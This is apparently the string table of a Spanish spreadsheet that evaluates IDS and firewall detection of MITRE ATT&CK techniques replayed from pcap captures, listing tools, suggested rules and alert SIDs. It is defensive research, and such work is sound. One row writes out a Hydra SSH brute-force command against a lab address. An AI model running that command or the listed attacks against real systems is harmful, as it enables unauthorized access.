  <si>
    <t>Manual [4] / B.22</t>
  </si>
  <si>
    <t>Manual [4] / 4.22</t>
  </si>
  <si>
    <t>NO (fuera del alcance de la red a proteger)</t>
  </si>
  <si>
    <t>El uso de varias fases y frentes de ataque en una comunicación C&amp;C es siempre un ataque</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: FortIGate detecta el establecimiento del canal de comunicación con la víctima. Sin embargo, no está detectando adecuadamente el uso de un frente de ataque, y la división del ataque en varias fases (lógico atendiendo a la naturaleza de la técnica)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Ataques Colaterales:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> PaloAlto detecta el uso de Covenant como herramienta de C2. Además, detecta los mensajes beacon correspondientes a Covenant . Los flujos no contarán para el calculo de la capacidad de deteccion</t>
    </r>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Transferencia de archivos de un servidor C2 a un equipo previamente comprometido</t>
  </si>
  <si>
    <t>Metasploit, FTP</t>
  </si>
  <si>
    <t>T1105-Ingress_Tool_Transfer_[5].pcapng</t>
  </si>
  <si>
    <t>Reglas genéricas que detecten un traspaso de archivos entre equipos utilizando protocolos de transferencia de ficheros como SMB, FTP... Dependiendo de las circunstancias del ataque tambien es importante detectar la transferencia de archivos malware que sean detectables mediante tráfico de red.</t>
  </si>
  <si>
    <t>Servidor FTP en el servidor C2. A través de la conexión del atacante a la víctima, usando el comando ftp transferimos herramientas desde el servidor C2 a la víctima</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.1</t>
  </si>
  <si>
    <t>Manual [5] / C.2</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.7</t>
  </si>
  <si>
    <t>La transferencia de herramientas de ingreso siempre es un ataque</t>
  </si>
  <si>
    <t>2000418, 2014906</t>
  </si>
  <si>
    <t>2002752, 2002749, 2000418, 2011803, 2003303, 2003410, 2014906, 2027768</t>
  </si>
  <si>
    <t>2000418, 2011803, 2003303, 2003410, 2014906, 2027768</t>
  </si>
  <si>
    <t>2027768, 2011803</t>
  </si>
  <si>
    <t>2002752, 2002749, 2003303, 2003410</t>
  </si>
  <si>
    <t>655989849, 52175</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Ataque de fuerza bruta basado en diccionario de contraseñas</t>
  </si>
  <si>
    <t>wifite</t>
  </si>
  <si>
    <t>T1110-Diccionario_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.7</t>
  </si>
  <si>
    <t>Manual [1] / E.26</t>
  </si>
  <si>
    <t>Manual [4] / 4.2.31</t>
  </si>
  <si>
    <t>El uso de fuerza bruta mediante diccionario siempre es un ataque</t>
  </si>
  <si>
    <t>L2 (WPA2)</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Ataque PMKID</t>
  </si>
  <si>
    <t>hashcat, hcxpcapngtool, hcxdumptool</t>
  </si>
  <si>
    <t>T1110-pmkid_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.6.3</t>
  </si>
  <si>
    <t>Manual [1] / E.25</t>
  </si>
  <si>
    <t>Manual [4] / 4.2.32</t>
  </si>
  <si>
    <t>Un ataque PMKID siempre es un ataque</t>
  </si>
  <si>
    <t>--</t>
  </si>
  <si>
    <t>PTW/KoreK/FMS</t>
  </si>
  <si>
    <t>T1110-Ptw_korek_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.5</t>
  </si>
  <si>
    <t>Manual [1] / E.24</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.33</t>
  </si>
  <si>
    <t>Un ataque de fuerza bruta siempre es un ataque</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Ataque sobre WPS</t>
  </si>
  <si>
    <t>wash, reaver</t>
  </si>
  <si>
    <t>T1110-Wps_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.8</t>
  </si>
  <si>
    <t>Manual [1] / E.27</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.34</t>
  </si>
  <si>
    <t>NO (no detectable por red)</t>
  </si>
  <si>
    <t>Obtención de contraseña por fuerza bruta (adivinación)</t>
  </si>
  <si>
    <t>FTP - Patator</t>
  </si>
  <si>
    <t>T1110.001-FTP-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un elevado número de intentos de acceso al servicio FTP de la víctima</t>
  </si>
  <si>
    <t>Manual [4] / B.32</t>
  </si>
  <si>
    <t>El uso de fuerza bruta para acceder via FTP a la víctima siempre es un ataque</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>T1110.001-Hydra_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío msaivo de peticiones de inicio de sesión SSH, alertando de un posible intento de acceso por fuerza bruta</t>
  </si>
  <si>
    <t>Obtener la contraseña para conectarse por SSH al equipo victima mediante fuerza bruta. Comando:  hydra -l dit -P pass.txt 172.16.2.2 -t 4 ssh</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.9</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.9.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.9.5</t>
  </si>
  <si>
    <t>El uso de fuerza bruta para acceder via SSH a la víctima siempre es un ataque</t>
  </si>
  <si>
    <t>2002752, 2002749, 19559</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos con Ataques Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: el número de flujos detectados para el RS3, a pesar de haber detectado mensajes, es cero debido a que la alerta 19559 no está asociada a ninguno en los logs (posteriormente de forma manual puede asociarse esta alerta al flujo correspondiente).</t>
    </r>
  </si>
  <si>
    <t>31914, 94174</t>
  </si>
  <si>
    <t>PaloAlto detecta el intento de conexión a SSH y el uso de libSSH, herramienta para realizar diferentes ataques con SSH</t>
  </si>
  <si>
    <t>SSH - Patator</t>
  </si>
  <si>
    <t>T1110.001-SSH-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Manual [4] / B.33</t>
  </si>
  <si>
    <t>650, 2003068, 2001219</t>
  </si>
  <si>
    <t>2003068, 2001219</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">650, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19559</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 17317, 2003068, 2001219</t>
    </r>
  </si>
  <si>
    <t>650, 19559, 17317</t>
  </si>
  <si>
    <t>650, 17317, 2003068, 2001219</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">650, 2003068, 2001219, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19559</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 17317, 2002749, 2002752, 2036752, 2100650</t>
    </r>
  </si>
  <si>
    <t>2003068, 2001219, 2002749, 2002752, 2100650</t>
  </si>
  <si>
    <t>650, 19559, 17317, 2036752</t>
  </si>
  <si>
    <t>31914, 40104, 55873, 40015</t>
  </si>
  <si>
    <t>40104, 40015</t>
  </si>
  <si>
    <t>31914, 55873</t>
  </si>
  <si>
    <t>PaloAlto detecta a nivel de aplicación SSH mediante Control de Aplicaciones e IPS</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modificación del Registro de forma remota</t>
  </si>
  <si>
    <t>reg (Remoto)</t>
  </si>
  <si>
    <t>T1112-Modify_registry_[4].pcapng</t>
  </si>
  <si>
    <t>WINREG</t>
  </si>
  <si>
    <t xml:space="preserve">Regla que detecte el envío de mensajes con protocolo WINREG o Remote Registry Service </t>
  </si>
  <si>
    <t>Manual [4] /  3.9</t>
  </si>
  <si>
    <t>Manual [4] / B.9</t>
  </si>
  <si>
    <t>Manual [4] / 4.9</t>
  </si>
  <si>
    <t>La modificación del registro de forma remota en ciertos contextos puede tratarse de actividad legítima</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319, 402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319, 402</t>
    </r>
  </si>
  <si>
    <t>44489, 402</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 402, 2002752, 2002749, 2100402, 2044666, 2051116</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>38319</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 402, 2100402, 2044666, 2051116</t>
    </r>
  </si>
  <si>
    <t>44489, 402, 2002752, 2002749, 2100402, 2044666, 2051116</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no detecta un flujo ICMP de la captura. Este flujo es irrelevante para el ataque</t>
    </r>
  </si>
  <si>
    <t>9999, 92322, 33836</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Flujos detectados PA: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Paloalto no detecta los protocolos BROWSER, MDNS, LLMNR</t>
    </r>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>Recolección de correos electrónicos de un servidor Microsoft Exchange haciendo uso de credenciales robadas</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>T1114-Email_collection_remote_email_collection_[4].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el intento de extracción de información relacionada con los correos electrónicos de una empresa alojados en un servidor Microsoft Exchange</t>
  </si>
  <si>
    <t>Manual [4] /  3.16</t>
  </si>
  <si>
    <t>Manual [4] / B.16</t>
  </si>
  <si>
    <t>Manual [4] / 4.16</t>
  </si>
  <si>
    <t>La recolección de correos electrónicos de un servidor Microsoft Exchange puede tratarse de una acción legítima en algunos contextos</t>
  </si>
  <si>
    <t>44604, 44489, 15935, 202685</t>
  </si>
  <si>
    <t>44489, 15935, 202685</t>
  </si>
  <si>
    <t>44604, 44489, 15935, 2002752, 2002749, 2044666, 2026850, 2036224, 2009345</t>
  </si>
  <si>
    <t>44604, 44489, 15935, 2044666, 2026850, 2036224, 2009345</t>
  </si>
  <si>
    <t>44489, 15935, 2002752, 2002749, 2044666, 2026850, 2036224, 2009345</t>
  </si>
  <si>
    <t>92322, 9999, 56497</t>
  </si>
  <si>
    <t>92322, 56497</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos detectados PA</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Paloalto detecta dos flujos más de los que hay en el ataque. PUEDE DEBERSE A LAS VARIACIONES EXISTENTES EN ESTOS FLUJOS</t>
    </r>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Codificacion de mensajes entre la victima y el C2 Server mediante Base64</t>
  </si>
  <si>
    <t>Metasploit, curl, base64</t>
  </si>
  <si>
    <t>T1132.001-Standard_Encoding_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalias</t>
  </si>
  <si>
    <t>Servidor HTTP en el C2 Server. Intercambio de mensajes entre la victima y atacante mediante base64</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.2</t>
  </si>
  <si>
    <t>Manual [5] / C.3</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.8</t>
  </si>
  <si>
    <t>La codificación en base 64 de un canal c2 siempre es un ataque</t>
  </si>
  <si>
    <t>2000418, 2034567, 2013028</t>
  </si>
  <si>
    <t>2000418, 2034567, 2013028, 50447</t>
  </si>
  <si>
    <t xml:space="preserve">50447, 2002752, 2002749, 2000418, 2011803, 2101620, 2034567, 2013028, 2002824
</t>
  </si>
  <si>
    <t>50447, 2000418, 2011803, 2034567, 2013028, 2002824</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza un flujo ICMP. Este flujo no es relevante para el ataque</t>
    </r>
  </si>
  <si>
    <t>Flujos detectados PA: Paloalto solo detecta los flujos correspondientes al ataque</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>TA0001</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>Acceso a red VPN desde dispositivo no autorizado con credenciales robadas</t>
  </si>
  <si>
    <t>OpenVPN</t>
  </si>
  <si>
    <t>T1133-External_remote_services_[4].pcapng</t>
  </si>
  <si>
    <t>NO***</t>
  </si>
  <si>
    <t xml:space="preserve">Existen varias variantes.
        Circunstancias concretas del ataque: el atacante realiza alguna interacción posterior una vez ha logrado acceder a la red (aplicable a esta técnica) como un escaneo de red o mensajes de anuncio de Host.
        Reglas personalizadas: regla que compruebe si las direcciones IP involucradas en los paquetes se corresponden con las autorizadas dentro de la red VPN (debe ser configurada manualmente).
</t>
  </si>
  <si>
    <t>Acceso a red VPN, sin interacciones adicionales más allá de las naturales al propio acceso</t>
  </si>
  <si>
    <t>Manual [4] /  3.3</t>
  </si>
  <si>
    <t>Manual [4] / B.3</t>
  </si>
  <si>
    <t>Manual [4] / 4.3</t>
  </si>
  <si>
    <t>El acceso a una red VPN es una acción legítima en algunos contextos</t>
  </si>
  <si>
    <t>1917, 254</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611, 1917, 254</t>
    </r>
  </si>
  <si>
    <t>24303, 27611, 1917, 254</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611, 1917, 254, 2101620, 2100527, 2002749, 2001117, 2101917</t>
    </r>
  </si>
  <si>
    <t>2101917, 2002749, 2100527, 2101620, 2001117</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611, 1917, 254, 2101620, 2100527, 2002749, 2001117, 2101917</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>24303</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 27611, 1917, 254, 2101620, 2100527, 2002749, 2001117, 2101917</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no toma en consideración para el análisis los flujos ICMPv6</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Flujos detectados PA: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>PaloAlto no analiza los flujos ICMPv6</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Instalación de Plugin en Navegador Chrome que reenvía información relacionada con búsquedas del usuario a un servidor</t>
  </si>
  <si>
    <t>Malicious-browser-extension</t>
  </si>
  <si>
    <t>T1176-Browser-extension_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en flujos de datos hacia direcciones no relacionadas con las búsquedas, normalmente en formato de objetos JavaScript</t>
  </si>
  <si>
    <t>Manual [4] /  3.7</t>
  </si>
  <si>
    <t>Manual [4] / B.7</t>
  </si>
  <si>
    <t>Manual [4] / 4.7</t>
  </si>
  <si>
    <t>El uso de una extensión maliciosa que publica información confidencial siempre es un ataque</t>
  </si>
  <si>
    <t>1917, 2002752, 2002749, 2101917, 2101620</t>
  </si>
  <si>
    <t>2002752, 2101620, 2002749, 2101917</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza dos flujos ICMP, pero no afecta a los resultados</t>
    </r>
  </si>
  <si>
    <t>internet-utility -- browser based</t>
  </si>
  <si>
    <t>212</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forzar intento de autenticación en un servidor para obtener credenciales de acceso</t>
  </si>
  <si>
    <t>SMB, NTLMssp-Extract</t>
  </si>
  <si>
    <t>T1187-Forced_Authentication_[5].pcapng</t>
  </si>
  <si>
    <t>Monitorizar tráfico SMB en puertos TCP 139,445, puerto UDP 137 y tráfico WebDAV</t>
  </si>
  <si>
    <t>Servidor SMB. El atacante captura el tráfico de red del intento de autenticación mediante Wireshark y aplica fuerza bruta a las credenciales capturadas</t>
  </si>
  <si>
    <t>Manual [5] / 4.5.1</t>
  </si>
  <si>
    <t>Manual [5] / C.4</t>
  </si>
  <si>
    <t>Manual [5] /  5.7.4</t>
  </si>
  <si>
    <t>Forzar un intento de autenticación siempre es un ataque</t>
  </si>
  <si>
    <t>44486, 44484, 44488</t>
  </si>
  <si>
    <t>2002752, 2002749, 44486, 44484, 44488</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44486, 44484, 44488</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44486, 44484, 44488</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Instancias Ataque</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: cada instancia de ataque se corresponde con una solicitud al server SMB con el usuario y contraseñas en el paquete</t>
    </r>
  </si>
  <si>
    <t>92322, 31696</t>
  </si>
  <si>
    <t>Consideramos los flujos en los que salta la alerta con SID 31696 para considerarlos como flujos con ataque</t>
  </si>
  <si>
    <t>T1187-Forced_Authentication2_[5].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44486, 44484, 44488</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44486, 44484, 44488</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44486, 44484, 44488</t>
    </r>
  </si>
  <si>
    <t>Cada instancia de ataque se corresponde con una solicitud al server SMB con el usuario y contraseñas en el paquete</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>HTML Exploit I - HTML Compilador</t>
  </si>
  <si>
    <t>Apache, Shadyantra</t>
  </si>
  <si>
    <t>T1189-Drive-by_compromise_v1_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el aprovechamiento de una vulnerabilidad del navegador Mozilla Firefox para llevar a cabo una compilación de código en la víctima</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para compilar código malware (no ejecutar)</t>
  </si>
  <si>
    <t>Manual [4] /  3.4</t>
  </si>
  <si>
    <t>Manual [4] / B.4</t>
  </si>
  <si>
    <t>Manual [4] / 4.4</t>
  </si>
  <si>
    <t>El uso de un exploit para compilar código en la víctima siempre es un ataque</t>
  </si>
  <si>
    <t>1917, 50447</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101917, 2011085, 1917, 50447</t>
  </si>
  <si>
    <t>2002752, 2002749, 2011085, 1917, 50447</t>
  </si>
  <si>
    <t>56610, 9999, 59219</t>
  </si>
  <si>
    <t>56610, 59219</t>
  </si>
  <si>
    <t>56610, 9999</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujo detectados PA</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Paloalto solo detecta los flujos con ataque</t>
    </r>
  </si>
  <si>
    <t>HTML Exploit II - Descarga de Ejecutable</t>
  </si>
  <si>
    <t>T1189-Drive-by_compromise_v2_[4].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte la descarga no autorizada de un archivo .exe (ejecutable) en el equipo víctima desde una página web posiblemente fraudulenta</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para descargar malware en formato ejecutable .exe</t>
  </si>
  <si>
    <t>La descarga no autorizada de un ejecutable no siempre es un ataque</t>
  </si>
  <si>
    <t>2016141, 50447</t>
  </si>
  <si>
    <t>2016141, 50447, 2002752, 2002749, 2011085, 2003595</t>
  </si>
  <si>
    <t>2016141, 50447, 2011085, 2003595</t>
  </si>
  <si>
    <t>2002752, 2002749, 50447, 2011085</t>
  </si>
  <si>
    <t>2016141, 2003595</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Inyección SQL</t>
  </si>
  <si>
    <t>Damn Vulnerable Web App (DVWA)</t>
  </si>
  <si>
    <t>T1190-Sql_injection-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla personalizada que detecte posibles cadenas asociadas a un ataque de inyección SQL en sentencias HTML</t>
  </si>
  <si>
    <t>Manual [4] / B.34</t>
  </si>
  <si>
    <t>Una inyección SQL siempre constituye un ataque</t>
  </si>
  <si>
    <t>2016672, 2006446, 2011037, 2010963, 2017808, 2006445, 2017337, 2011042</t>
  </si>
  <si>
    <t>2006446, 2011037, 2010963, 2017808, 2006445, 2017337, 2011042</t>
  </si>
  <si>
    <t>2016672, 2006446, 2011037, 2010963, 2017808, 2006445, 2017337, 2011042, 50447, 19439, 19440, 13990, 24172, 31939, 44416</t>
  </si>
  <si>
    <t>2016672, 50447</t>
  </si>
  <si>
    <t>2006446, 2011037, 2010963, 2017808, 2006445, 2017337, 2011042, 19439, 19440, 13990, 24172, 31939, 44416</t>
  </si>
  <si>
    <t xml:space="preserve">50447, 19439, 19440, 13990, 24172, 31939, 44416, 2002749, 2002752, 2016672, 2020506, 2006446, 2011037, 2010963, 2017808, 2006445, 2017337, 2011042, 2012885, 2009004
</t>
  </si>
  <si>
